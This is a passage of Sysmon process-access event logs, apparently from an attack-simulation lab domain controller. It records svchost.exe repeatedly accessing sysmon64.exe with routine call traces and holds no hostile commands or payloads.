C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.765","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2420,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.765\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.765","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2421,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.765\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.765","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2422,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.765\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.765","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2423,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.765\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.765","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2424,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.765\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.765","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2425,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.765\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.765","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2426,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.765\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.765","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2427,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.765\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 